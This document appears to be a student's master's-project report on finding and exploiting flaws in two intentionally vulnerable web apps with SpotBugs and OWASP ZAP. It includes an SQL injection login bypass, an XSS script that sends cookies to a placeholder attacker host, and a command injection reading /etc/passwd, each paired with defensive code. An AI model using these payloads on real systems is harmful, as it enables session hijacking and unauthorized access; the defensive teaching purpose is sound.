Vulnerabilities Identification and Exploitation

An extensive report on security testing practices for identifying, assessing, and exploiting vulnerabilities in web applications, detailed with real-world data and code examples.

Project Overview

This project was executed as part of a Master’s degree in Computer Science, focusing on the hands-on application of security testing techniques to uncover and exploit vulnerabilities in two intentionally vulnerable web applications: Bodgeit Store and Vulnerable App.

Tools and Technologies Employed

  • Eclipse: Used for setting up the web applications.
  • Spotbugs with Find-Sec-Bugs Plugin: Conducted static analysis to locate potential security issues.
  • OWASP ZAP 2.11.1: Applied for dynamic analysis, identifying vulnerabilities during application runtime.

Detailed Vulnerability Assessment

The project undertook a thorough examination of each application, yielding a comprehensive set of data on potential security flaws.

Bodgeit Store Vulnerabilities

  • Total Warnings from Static Analysis: 19 warnings, indicating possible weak cryptographic protocols.
  • Dynamic Analysis Findings: Identified 1050 possible attack vectors across 16 different classes of vulnerabilities.

Vulnerable App Vulnerabilities

  • Static Analysis Outcome: Produced 46 warnings with 20 categorized as “scary” due to their potential impact.
  • Dynamic Analysis Result: Revealed 36 possible attack vectors across 5 different vulnerability classes.

Exploitation Techniques and Code Examples

SQL Injection Exploitation

This attack exploited weak input validation to manipulate SQL queries and gain unauthorized access to the database.

# Example of SQL Injection Attack Vector
import requests

payload = "' OR '1'='1'; --"  # closes the quoted value, adds an always-true condition, comments out the rest
response = requests.post('http://example.com/login', data={'username': payload})

This payload closes the username string literal, appends a condition that is always true and comments out the remainder of the query, so the login check passes without a valid password.
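To show why the page's payload works and how parameterized queries stop it, here is an added example (not code from the project or the tested applications): a constructed in-memory SQLite users table stands in for the login backend, and the same credentials are checked once by string concatenation and once with bound parameters.

```python
import sqlite3

# Constructed stand-in for the login backend: an in-memory users table
# (assumption; the real schema of the tested application is not on the page).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 's3cret')")
    conn.commit()
    return conn

PAYLOAD = "' OR '1'='1'; --"  # the payload quoted above

def login_vulnerable(conn, username, password):
    # String concatenation: the payload closes the quote, adds an always-true
    # condition and comments out the password check, so the count is non-zero.
    sql = ("SELECT COUNT(*) FROM users WHERE username = '" + username
           + "' AND password = '" + password + "'")
    return conn.execute(sql).fetchone()[0] > 0

def login_parameterized(conn, username, password):
    # Bound parameters: the driver sends the payload as data, never as SQL,
    # so it is compared literally against the username column and fails.
    sql = "SELECT COUNT(*) FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone()[0] > 0

def demo():
    # Runs both checks with the payload and a wrong password, plus one
    # legitimate login to show the parameterized version still works.
    conn = make_db()
    return {
        "vulnerable_bypassed": login_vulnerable(conn, PAYLOAD, "wrong"),
        "parameterized_bypassed": login_parameterized(conn, PAYLOAD, "wrong"),
        "parameterized_valid": login_parameterized(conn, "alice", "s3cret"),
    }
```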

Cross-Site Scripting (XSS) Exploitation

Demonstrated how an attacker could inject malicious JavaScript into web pages viewed by other users, stealing cookies or session tokens.

<script>
// Example of injecting a script to steal cookies
document.location='http://attacker.com/cookie_stealer.php?cookie='+document.cookie;
</script>

This script redirects the user to a malicious website while sending along the user’s session cookie, potentially leading to session hijacking.
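As an added example (not code from the project or the tested applications), the two defences that neutralise the script above: output encoding so a stored comment is displayed rather than executed, and an HttpOnly session cookie that document.cookie cannot read. The comment markup, the cookie name and the session value are constructed for the illustration.

```python
import html

# Constructed stored comment carrying the cookie-stealing script shown above.
EVIL_COMMENT = ("<script>document.location='http://attacker.com/"
                "cookie_stealer.php?cookie='+document.cookie;</script>")

def render_comment_vulnerable(comment):
    # The comment is inserted into the page unchanged, so the browser runs it.
    return '<div class="comment">' + comment + '</div>'

def render_comment_escaped(comment):
    # Output encoding for the HTML body context: < > & " ' become entities and
    # the browser displays the text instead of executing it.
    return '<div class="comment">' + html.escape(comment, quote=True) + '</div>'

def session_cookie_header(session_id):
    # HttpOnly keeps the cookie out of document.cookie, so a script that does
    # run cannot read it; Secure and SameSite limit where the browser sends it.
    # The cookie name SESSIONID is a constructed placeholder.
    return f"Set-Cookie: SESSIONID={session_id}; HttpOnly; Secure; SameSite=Lax"

def has_executable_script(rendered):
    # Crude marker used only to contrast the two renderers.
    return "<script" in rendered.lower()
```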

Extended Vulnerability Analysis and Exploitation Details

Bodgeit Store Detailed Findings

Static Analysis Findings:

  • Total Vulnerabilities Identified: 19 with varying severity:
    • 11 “Scary”: Includes weak cryptographic protocols susceptible to breaches.
    • 7 “Troubling”: Potential vulnerabilities but with lower risk factors.
    • 1 “Of Concern”: Requires attention but not immediately exploitable.

Dynamic Analysis Results:

  • Total Attack Vectors Identified: 1050 potential vectors categorized into 16 classes:
    • High-Risk Alerts: 1 alert with 2 vectors found.
    • Medium-Risk Alerts: 649 vectors indicating significant exposure.
    • Low-Risk Alerts: 130 vectors that could lead to information disclosure.
    • Informational Alerts: 248 vectors providing insights but not direct threats.

# Example of exploiting a Cross-Site Scripting vulnerability
import requests

payload = "<script>alert('XSS');</script>"
response = requests.post('http://example.com/comment', data={'comment': payload})

Manual Analysis and Exploitation:

Successfully exploited 4 vulnerabilities including SQL injection and XSS using crafted payloads. Demonstrated the ability to manipulate session cookies and execute unauthorized commands.

Vulnerable App Comprehensive Review

Static Analysis Outcomes:

  • Total Warnings: 46 warnings with a high potential for exploitation:
    • 20 “Scary”: Critical vulnerabilities requiring immediate intervention.
    • 26 “Troubling”: Lesser severity but necessitates monitoring.

Dynamic Analysis Results:

  • Identified fewer vectors compared to Bodgeit Store but with impactful vulnerabilities:
    • Medium-Risk Alerts: 4 vectors potentially compromising system integrity.
    • Low-Risk and Informational Alerts: 32 vectors highlighting possible security misconfigurations.

# Command Injection example exploiting a system shell
import requests

command = "; cat /etc/passwd"  # `;` ends the intended command so the shell runs a second one
response = requests.get('http://example.com/process', params={'input': command})
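As an added example (not code from the project or the tested applications), why the payload above depends on a shell and how the endpoint should be written instead: an allowlist on the input and an argv list with no shell. The tool name `lookup` is hypothetical, and a Python one-liner stands in for it so the example runs anywhere.

```python
import re
import subprocess
import sys

PAYLOAD = "; cat /etc/passwd"  # the payload quoted above

def build_command_vulnerable(user_input):
    # One string handed to a shell: `;` ends the intended command and starts
    # the attacker's. Returned, not executed, so the injection is visible.
    # `lookup` is a hypothetical tool name used only for this illustration.
    return f"lookup {user_input}"

SAFE_INPUT = re.compile(r"^[A-Za-z0-9_.-]{1,64}$")

def is_allowed(user_input):
    # Allowlist validation: reject anything outside a small set of characters
    # the endpoint legitimately needs, which excludes every shell metacharacter.
    return SAFE_INPUT.match(user_input) is not None

def run_without_shell(user_input):
    # argv list with shell=False: the operating system receives the value as a
    # single argument, so `;`, `|`, backticks and friends are never interpreted.
    # The Python one-liner stands in for `lookup` and just echoes its argument.
    proc = subprocess.run(
        [sys.executable, "-c", "import sys; print(sys.argv[1])", user_input],
        capture_output=True, text=True, check=True)
    return proc.stdout.rstrip("\n")

def process(user_input):
    # The hardened endpoint: validate first, then run without a shell.
    if not is_allowed(user_input):
        return None
    return run_without_shell(user_input)
```

Even without the allowlist, run_without_shell returns the payload as literal text, which is the property the vulnerable string-built command lacks.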

Manual Analysis and Exploitation:

Detailed manual testing allowed for the exploitation of 6 unique vulnerabilities. Exploited vulnerabilities include command injection, path traversal, and unauthorized file access.

Security Metrics and Exploitation Summary

Bodgeit Store:

  • Static Analysis Time: 74 minutes to review results.
  • Dynamic Analysis Time: 224 minutes to analyze and categorize results.
  • Manual Exploitation Time: 14 minutes for effective vulnerability exploitation.

Vulnerable App:

  • Static Analysis Time: 162 minutes, highlighting the depth of vulnerabilities.
  • Dynamic Analysis Time: 22 minutes, limited by the tool’s reach in the application.
  • Manual Exploitation Time: 193 minutes, detailed exploitation of complex vulnerabilities.

Discussion on Results

The use of security testing tools like SpotBugs and OWASP ZAP proved essential in identifying and exploiting vulnerabilities within intentionally vulnerable applications. The project demonstrated the effectiveness of these tools in a controlled educational environment and highlighted the importance of comprehensive security testing in the development lifecycle.

  • Tool Effectiveness: SpotBugs was more effective in static analysis, especially for Vulnerable App, identifying numerous critical vulnerabilities. OWASP ZAP excelled in dynamic analysis for Bodgeit Store, uncovering a wide range of exploitable vulnerabilities.

  • Learning Outcome: The project significantly enhanced understanding of web application security, particularly in identifying, assessing, and mitigating risks. It also underscored the importance of integrating security testing early in the development process to detect and resolve vulnerabilities before deployment.

Conclusion

This project not only highlighted the critical importance of regular security assessments for web applications but also provided a hands-on approach to understanding and mitigating common security threats. The findings underscore the need for developers to adopt secure coding practices and for organizations to maintain robust security protocols.

For further insights and detailed findings, explore the project repository on GitHub.

Feel free to reach out for discussions on web application security or any related topics!